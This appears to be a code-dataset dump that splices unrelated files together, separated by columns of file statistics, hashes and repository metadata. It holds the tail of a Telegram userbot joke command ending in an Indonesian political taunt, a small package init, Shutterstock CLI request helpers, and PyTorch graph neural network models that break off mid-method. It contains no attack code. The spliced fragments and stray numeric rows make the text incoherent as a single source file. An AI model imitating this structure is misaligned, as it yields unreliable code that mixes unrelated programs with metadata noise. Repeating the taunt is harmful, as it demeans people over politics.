sleep(0.03)
await typew.edit(str(number) + "% █████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████████▌")
sleep(1)
await typew.edit("`SEE U ANTEK P K I`")
CMD_HELP.update(
{
"petrus": "`.petrus`\
\nUsage: canda petrus."
}
)
| 29.90184
| 60
| 0.487895
| 1,277
| 9,748
| 4.414252
| 0.111981
| 0.186269
| 0.260777
| 0.301579
| 0.793507
| 0.778783
| 0.778783
| 0.778783
| 0.778783
| 0.778783
| 0
| 0.057059
| 0.26826
| 9,748
| 325
| 61
| 29.993846
| 0.609281
| 0
| 0
| 0.634375
| 0
| 0
| 0.145261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009375
| 0
| 0.009375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2f7667e4813d9f2fb9d9ea413b2ea490d288a469
| 179
|
py
|
Python
|
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | null | null | null |
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | 9
|
2021-02-05T16:23:17.000Z
|
2021-04-16T13:47:15.000Z
|
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | null | null | null |
"""Security helpers."""
from h_vialib.secure.expiry import quantized_expiry
from h_vialib.secure.token import SecureToken
from h_vialib.secure.url import SecureURL, ViaSecureURL
| 29.833333
| 55
| 0.832402
| 25
| 179
| 5.8
| 0.56
| 0.103448
| 0.227586
| 0.351724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 5
| 56
| 35.8
| 0.889571
| 0.094972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
85efe0f5b690a0a0557b8e1413fbeb700f2b6c4d
| 37
|
py
|
Python
|
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
print("\033[1;47mOlá, mundo!\033[m")
| 18.5
| 36
| 0.648649
| 7
| 37
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257143
| 0.054054
| 37
| 1
| 37
| 37
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
c847e6f5a5165c04d51932822fdf963d562a8d61
| 2,636
|
py
|
Python
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 3
|
2021-08-12T23:41:33.000Z
|
2022-03-14T18:52:31.000Z
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 2
|
2017-09-05T11:26:55.000Z
|
2021-05-08T17:28:45.000Z
|
shutterstock/utils/request.py
|
shutterstock/shutterstock-cli
|
736a6f0ee1c3fd9cf02095820be79b1a8bbc5f86
|
[
"MIT"
] | 2
|
2021-03-25T20:58:52.000Z
|
2022-03-22T08:41:15.000Z
|
""""
HTTP functions.
"""
import json
import os
import requests
from .prettyprint import pretty_print
from .request_helper import RequestHelper
COLORIZE_OUTPUT = os.getenv("SHUTTERSTOCK_CLI_COLORIZE_OUTPUT")
def get(url, params, json_data=None):
"""
Get resource.
:param url: URL of the endpoint.
:param params: Request parameters.
:param json_data: Request body.
:return: None
"""
req = RequestHelper()
res = requests.get(
url=f"{req.base_endpoint}{url}",
params=params,
headers=req.headers,
auth=req.auth,
)
try:
if not COLORIZE_OUTPUT:
print(json.dumps(res.json(), indent=4))
return
pretty_print(res.json())
except json.decoder.JSONDecodeError:
print(res.content)
def post(url, params, json_data):
"""
Post resource.
:param url: URL of the endpoint.
:param params: Request parameters.
:param json_data: Request body.
:return: None
"""
req = RequestHelper()
res = requests.post(
url=f"{req.base_endpoint}{url}",
params=params,
json=json_data,
headers=req.headers,
auth=req.auth,
)
try:
if not COLORIZE_OUTPUT:
print(json.dumps(res.json(), indent=4))
return
pretty_print(res.json())
except json.decoder.JSONDecodeError:
print(res.content)
def delete(url, params, json_data):
"""
Delete resource.
:param url: URL of the endpoint.
:param params: Request parameters.
:param json_data: Request body.
:return: None
"""
req = RequestHelper()
res = requests.delete(
url=f"{req.base_endpoint}{url}",
params=params,
json=json_data,
headers=req.headers,
auth=req.auth,
)
try:
if not COLORIZE_OUTPUT:
print(json.dumps(res.json(), indent=4))
return
pretty_print(res.json())
except json.decoder.JSONDecodeError:
print(res.content)
def put(url, params, json_data):
"""
Put resource.
:param url: URL of the endpoint.
:param params: Request parameters.
:param json_data: Request body.
:return: None
"""
req = RequestHelper()
res = requests.put(
url=f"{req.base_endpoint}{url}",
params=params,
json=json_data,
headers=req.headers,
auth=req.auth,
)
try:
if not COLORIZE_OUTPUT:
print(json.dumps(res.json(), indent=4))
return
pretty_print(res.json())
except json.decoder.JSONDecodeError:
print(res.content)
| 23.327434
| 63
| 0.598255
| 308
| 2,636
| 5.025974
| 0.165584
| 0.056848
| 0.033592
| 0.043928
| 0.814599
| 0.814599
| 0.814599
| 0.814599
| 0.792636
| 0.792636
| 0
| 0.002128
| 0.286798
| 2,636
| 112
| 64
| 23.535714
| 0.821277
| 0.2022
| 0
| 0.73913
| 0
| 0
| 0.064909
| 0.064909
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.072464
| 0
| 0.188406
| 0.188406
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c84de06d4ff0c3c018631ed962f029fe11e6bda3
| 44,436
|
py
|
Python
|
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
dev/models_pysr.py
|
astrockragh/GraphMerge
|
25869b798158eb9c1c3aa613642c9bbd4a07e300
|
[
"MIT"
] | null | null | null |
import torch.nn.functional as F
from torch.nn import Linear, LayerNorm, LeakyReLU, Module, ReLU, Sequential, ModuleList
from torch_geometric.nn import SAGEConv, global_mean_pool, norm, global_max_pool, global_add_pool, MetaLayer
from torch_scatter import scatter_mean, scatter_sum, scatter_max, scatter_min, scatter_add
from torch import cat, square,zeros, clone, abs, sigmoid, float32, tanh, clamp
class MLP(Module):
def __init__(self, n_in, n_out, hidden=64, nlayers=2, layer_norm=True):
super().__init__()
'''Simple MLP class with ReLU activiation + layernorm'''
layers = [Linear(n_in, hidden), ReLU()]
for i in range(nlayers):
layers.append(Linear(hidden, hidden))
layers.append(ReLU())
if layer_norm:
layers.append(LayerNorm(hidden))
layers.append(Linear(hidden, n_out))
self.mlp = Sequential(*layers)
def forward(self, x):
return self.mlp(x)
class Sage(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(Sage, self).__init__()
'''Model built upon the GraphSAGE convolutional layer. This is a node only model (no global, no edge).
Model takes a data object from a dataloader in the forward call and takes out the rest itself.
hidden_channels, n_in, n_out must be specified
Most other things can be customized at wish, e.g. activation functions for which ReLU and LeakyReLU can be used'''
self.encode=encode
if self.encode:
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True) #could turn up hidden states
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
if self.encode:
self.convs.append(SAGEConv(hidden_channels, hidden_channels))
else:
self.convs.append(SAGEConv(in_channels, hidden_channels))
for _ in range(int(conv_layers-1)):
self.convs.append(SAGEConv(hidden_channels, hidden_channels))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
if self.decode_activation =='relu':
print('RelU decode activation')
act = ReLU()
return act
if self.decode_activation =='leakyrelu':
print('LeakyRelU decode activation')
act=LeakyReLU()
return act
if not self.decode_activation:
print("Please specify a decode activation function")
return None
def forward(self, graph):
#get the data
x, edge_index, batch = graph.x, graph.edge_index, graph.batch
#encode
if self.encode:
x = self.node_enc(x)
#convolutions
for conv in self.convs:
x = conv(x, edge_index)
x=self.conv_act(x) ##choose whichever
if self.agg=='sum': ## sum for physics
x = global_add_pool(x, batch)
if self.agg=='max':
x = global_max_pool(x, batch)
#decoder
x_out=[]
for norm, decode in zip(self.norms, self.decoders):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
x_out.append(x1)
x_out=cat(x_out, dim=1)
# variance
if self.variance:
sig=[]
for norm, decode in zip(self.sig_norms, self.sigs):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
sig.append(x1)
sig=abs(cat(sig, dim=1)) #stability
if self.rho!=0:
rho=[]
for norm, decode in zip(self.rho_norms, self.rhos):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1) ##note that these are LeakyReLU and should continue as such, otherwise you have to remove them from the last layer
rho.append(x1)
rho=cat(rho, dim=1)
if self.variance:
if self.rho!=0:
return x_out, sig, clamp(tanh(rho), min=-0.999, max=0.999) #stability
else:
return x_out, sig
else:
return x_out
######################################
### Make own MetaLayer-based Class ###
######################################
node_aggregation = scatter_sum # scatter_mean
global_aggregation = scatter_sum # scatter_mean
class EdgeModel(Module):
def __init__(self, hidden):
super(EdgeModel, self).__init__()
self.mlp = MLP(hidden * 4, hidden, layer_norm=True)
def forward(self, src, dest, edge_attr, u, batch): #forward should include everything
# source, target: [E, F_x], where E is the number of edges.
# edge_attr: [E, F_e]
# u: [B, F_u], where B is the number of graphs. ##what is B??
# batch: [E] with max entry B - 1.
cur_state = cat([src, dest, edge_attr, u[batch]], 1)
return edge_attr + self.mlp(cur_state)
class EdgeModel2(Module):
def __init__(self, hidden):
super(EdgeModel2, self).__init__()
self.mlp = MLP(3*hidden, hidden, layer_norm=True)
def forward(self, src, dest, edge_attr, u, batch): #forward should include everything
# source, target: [E, F_x], where E is the number of edges.
# edge_attr: [E, F_e]
# u: [B, F_u], where B is the number of graphs. ##what is B??
# batch: [E] with max entry B - 1.
cur_state = cat([src, dest, edge_attr], 1)
return edge_attr + self.mlp(cur_state)
class NodeModel(Module):
def __init__(self, hidden):
super(NodeModel, self).__init__()
self.node_mlp_1 = MLP(hidden * 2, hidden, layer_norm=True)
self.node_mlp_2 = MLP(hidden * 3, hidden, layer_norm=True)
def forward(self, x, edge_index, edge_attr, u, batch): #forward should include everything
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
row, col = edge_index
out = cat([x[row], edge_attr], dim=1)
out = self.node_mlp_1(out)
out = node_aggregation(out, col, dim=0, dim_size=x.size(0))
out = cat([x, out, u[batch]], dim=1)
return x + self.node_mlp_2(out)
class NodeModel2(Module):
def __init__(self, hidden):
super(NodeModel, self).__init__()
self.node_mlp_1 = MLP(hidden , hidden, layer_norm=True)
self.node_mlp_2 = MLP(hidden * 2, hidden, layer_norm=True)
def forward(self, x, edge_index, edge_attr, u, batch): #forward should include everything
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
row, col = edge_index
out = cat([x[row], edge_attr], dim=1)
out = self.node_mlp_1(out)
out = node_aggregation(out, col, dim=0, dim_size=x.size(0))
out = cat([x, out], dim=1)
return x + self.node_mlp_2(out)
class NodeNodeModel(Module):
def __init__(self, hidden):
super(NodeNodeModel, self).__init__()
self.node_mlp_1 = MLP(hidden, hidden, layer_norm=True)
self.node_mlp_2 = MLP(hidden, hidden, layer_norm=True)
def forward(self, x, edge_index, edge_attr, u, batch): #forward should include everything
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
row, col = edge_index
out = x[row]
out = self.node_mlp_1(out)
out = node_aggregation(out, col, dim=0, dim_size=x.size(0))
out = x
return x + self.node_mlp_2(out)
###############################################################################################
## If one is interested in doing some decoding on the global model / put in global features ###
###############################################################################################
class GlobalModel(Module):
def __init__(self, hidden):
super(GlobalModel, self).__init__()
self.global_mlp = MLP(hidden * 2, hidden, layer_norm=True)
def forward(self, x, edge_index, edge_attr, u, batch): #forward should include everything
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
out = cat([u, global_aggregation(x, batch, dim=0)], dim=1)
return u + self.global_mlp(out) # do these just add on top of each other
class GlobalModelMulti(Module):
def __init__(self, hidden):
super(GlobalModelMulti, self).__init__()
self.global_mlp = MLP(hidden * 5, hidden, layer_norm=True)
'''Global model with many different global feats'''
def forward(self, x, edge_index, edge_attr, u, batch): #forward should include everything
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
#takes a series of different global things into consideration
s=scatter_sum(x, batch, dim=0)
me=scatter_mean(x, batch, dim=0)
mi=scatter_min(x, batch, dim=0)[0]
ma=scatter_max(x, batch, dim=0)[0]
std=scatter_mean(square(x), batch, dim=0)-square(me)
concat = cat([u, s, mi, ma, std], dim=1)
return u + self.global_mlp(concat) ## still a bit in doubt over if this should be a sum
###############################################################################################
# Put it all together like https://arxiv.org/pdf/1806.01261.pdf
class MetaMulti(Module):
def __init__(self, hidden_states, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=1, decode_activation='none', layernorm=True):
super(self.__class__, self).__init__()
'''This model is in early attempt, it's a bit slow but has higher levels of interpretability and should theoretically be better'''
hidden=hidden_states
n_in=in_channels
n_out=out_channels
self.node_enc = MLP(n_in, hidden, layer_norm=True)
self.edge_enc = MLP(3, hidden, layer_norm=True)
self.decoder = MLP(hidden, n_out)
self.ops = ModuleList(
[
MetaLayer(edge_model=EdgeModel(hidden), node_model=NodeModel(hidden), global_model=GlobalModelMulti(hidden))
for _ in range(conv_layers)
]
)
self.hidden = hidden
self.norm_out=LayerNorm(normalized_shape=self.hidden)
def forward(self, graph):
x = self.node_enc(graph.x) # Take all feats and encode
e_feat = graph.x[:,[0,3]] # scale factor and virial mass
adj = graph.edge_index
e_encode=cat([graph.edge_attr.view(-1,1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
e = self.edge_enc(e_encode) #put in edge_attr
# Initialize global features as 0:
u = zeros(
graph.batch[-1] + 1, self.hidden, device=x.device, dtype=float32
)
batch = graph.batch
for op in self.ops:
x, e, u = op(x, adj, e, u, batch)
x = global_add_pool(x, batch)
out = self.decoder(self.norm_out(x))
return out
class Meta(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(Meta, self).__init__()
'''Same as above but without the multi concat '''
self.encode=encode
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
self.edge_enc = MLP(3, hidden_channels, layer_norm=True)
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=GlobalModelMulti(hidden_channels)))
for _ in range(int(conv_layers-1)):
self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels), node_model=NodeModel(hidden_channels), global_model=GlobalModelMulti(hidden_channels)))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
if self.decode_activation =='relu':
print('RelU decode activation')
act = ReLU()
return act
if self.decode_activation =='leakyrelu':
print('LeakyRelU decode activation')
act=LeakyReLU()
return act
if not self.decode_activation:
print("Please specify a decode activation function")
return None
def forward(self, graph):
#get the data
x = self.node_enc(graph.x) # Take all feats and encode
e_feat = graph.x[:,[0,3]] # scale factor and virial mass
adj = graph.edge_index
e_encode=cat([graph.edge_attr.view(-1,1), e_feat[adj[0]] - e_feat[adj[1]]], -1)
e = self.edge_enc(e_encode) #put in edge_attr
# Initialize global features as 0:
u = zeros(
graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
)
#convolutions
batch = graph.batch
for op in self.convs:
x, e, u = op(x, adj, e, u, batch)
if self.agg=='sum':
x = global_add_pool(x, batch)
if self.agg=='max':
x = global_max_pool(x, batch)
#decoder
x_out=[]
for norm, decode in zip(self.norms, self.decoders):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
x_out.append(x1)
x_out=cat(x_out, dim=1)
# variance
if self.variance:
sig=[]
for norm, decode in zip(self.sig_norms, self.sigs):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
sig.append(x1)
sig=abs(cat(sig, dim=1))
if self.rho!=0:
rho=[]
for norm, decode in zip(self.rho_norms, self.rhos):
x1=clone(x)
for n, d in zip(norm, decode):
x1=d(n(x1))
x1=self.decode_act(x1)
rho.append(x1)
rho=abs(cat(rho, dim=1)) ### not sure this works with only 1d
if self.variance:
if self.rho!=0:
return x_out, sig, tanh(rho)
else:
return x_out, sig
else:
return x_out
class MetaEdge2(Module):
def __init__(self, hidden_channels, in_channels, out_channels, encode=True, conv_layers=3, conv_activation='relu',
decode_layers=2, decode_activation='none', layernorm=True, variance=0, agg='sum', rho=0):
super(MetaEdge2, self).__init__()
''' Same as above but no global model'''
self.encode=encode
self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
self.edge_enc = MLP(hidden_channels, hidden_channels, layer_norm=True)
self.decode_activation=decode_activation
self.conv_activation=conv_activation
self.layernorm=layernorm
self.in_channels=in_channels
self.out_channels=out_channels
self.hidden_channels=hidden_channels
self.variance=variance
self.agg=agg
self.rho=rho
########################
# Convolutional Layers #
########################
self.convs=ModuleList()
self.convs.append(MetaLayer(edge_model=EdgeModel2(hidden_channels), node_model=NodeModel(hidden_channels), global_model=None))
for _ in range(int(conv_layers-1)):
self.convs.append(MetaLayer(edge_model=EdgeModel2(hidden_channels), node_model=NodeModel(hidden_channels), global_model=None))
##################
# Decode Layers #
##################
self.decoders = ModuleList()
self.norms = ModuleList()
for _ in range(out_channels):
self.decoder=ModuleList()
self.norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1: ## if final layer, make layer with only one output
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, 1))
else:
self.norm.append(LayerNorm(normalized_shape=hidden_channels))
self.decoder.append(Linear(hidden_channels, hidden_channels))
self.decoders.append(self.decoder)
self.norms.append(self.norm)
###################
# Variance Layers #
###################
if variance:
self.sigs = ModuleList()
self.sig_norms = ModuleList()
for _ in range(out_channels):
self.sig=ModuleList()
self.sig_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, 1))
else:
self.sig_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.sig.append(Linear(hidden_channels, hidden_channels))
self.sigs.append(self.sig)
self.sig_norms.append(self.sig_norm)
######################
# Co-Variance Layers #
######################
if self.rho!=0:
self.rhos = ModuleList()
self.rho_norms = ModuleList()
for _ in range(self.rho):
self.rho_l=ModuleList()
self.rho_norm=ModuleList()
for i in range(decode_layers):
if i==decode_layers-1:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, 1))
else:
self.rho_norm.append(LayerNorm(normalized_shape=hidden_channels))
self.rho_l.append(Linear(hidden_channels, hidden_channels))
self.rhos.append(self.rho_l)
self.rho_norms.append(self.rho_norm)
#####################
# Activation Layers #
#####################
self.conv_act=self.conv_act_f()
self.decode_act=self.decode_act_f() ## could apply later
def conv_act_f(self):
if self.conv_activation =='relu':
print('RelU conv activation')
act = ReLU()
return act
if self.conv_activation =='leakyrelu':
print('LeakyRelU conv activation')
act=LeakyReLU()
return act
if not self.conv_activation:
raise ValueError("Please specify a conv activation function")
def decode_act_f(self):
if self.decode_activation =='relu':
print('RelU decode activation')
act = ReLU()
return act
if self.decode_activation =='leakyrelu':
print('LeakyRelU decode activation')
act=LeakyReLU()
return act
if not self.decode_activation:
print("Please specify a decode activation function")
